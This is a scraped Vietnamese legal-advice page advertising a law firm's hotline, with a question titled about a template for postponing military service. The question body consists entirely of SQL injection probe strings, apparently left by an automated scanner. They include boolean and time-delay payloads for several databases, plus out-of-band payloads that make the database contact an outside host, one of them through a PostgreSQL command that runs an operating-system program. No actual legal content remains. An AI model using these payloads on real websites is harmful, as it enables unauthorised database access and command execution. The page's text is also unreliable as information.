Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Mẫu đơn xin tạm hoãn nghĩa vụ quân sự?

Cập nhật lần cuối lúc 11:55 ngày 14/07/2014

1
1
1
1'"
1
\
-1 OR 2+526-526-1=0+0+0+1 --
1
-1 OR 3+526-526-1=0+0+0+1 --
@@QQngm
JyI=
-1 OR 3*2<(0+5+526-526) --
-1 OR 3*2>(0+5+526-526) --
-1 OR 2+457-457-1=0+0+0+1
-1 OR 3+457-457-1=0+0+0+1
-1 OR 3*2<(0+5+457-457)
-1 OR 3*2>(0+5+457-457)
-1' OR 2+808-808-1=0+0+0+1 --
-1' OR 3+808-808-1=0+0+0+1 --
-1' OR 3*2<(0+5+808-808) --
-1' OR 3*2>(0+5+808-808) --
-1' OR 2+605-605-1=0+0+0+1 or '1q9DJZSV'='
-1' OR 3+605-605-1=0+0+0+1 or '1q9DJZSV'='
-1' OR 3*2<(0+5+605-605) or '1q9DJZSV'='
-1' OR 3*2>(0+5+605-605) or '1q9DJZSV'='
-1" OR 2+880-880-1=0+0+0+1 --
-1" OR 3+880-880-1=0+0+0+1 --
-1" OR 3*2<(0+5+880-880) --
-1" OR 3*2>(0+5+880-880) --
if(now()=sysdate(),sleep(11.814),0)/*'XOR(if(now()=sysdate(),sleep(11.814),0))OR'"XOR(if(now()=sysdate(),sleep(11.814),0))OR"*/
(select(0)from(select(sleep(3.938)))v)/*'+(select(0)from(select(sleep(3.938)))v)+'"+(select(0)from(select(sleep(3.938)))v)+"*/
-1; waitfor delay '0:0:3.938' --
-1; waitfor delay '0:0:11.814' --
-1); waitfor delay '0:0:7.876' --
1 waitfor delay '0:0:7.876' --
9orl337p'; waitfor delay '0:0:7.876' --
-1;select pg_sleep(11.814); --
-1);select pg_sleep(11.814); --
-1));select pg_sleep(11.814); --
on2PzuR7';select pg_sleep(11.814); --
hIov2MIC');select pg_sleep(3.938); --
C8GelVXO'));select pg_sleep(3.938); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5331.34060.e2b22.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5332.34060.e2b22.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5333.34060.e2b22.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5334.34060.e2b22.\1.bxss.me
984'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: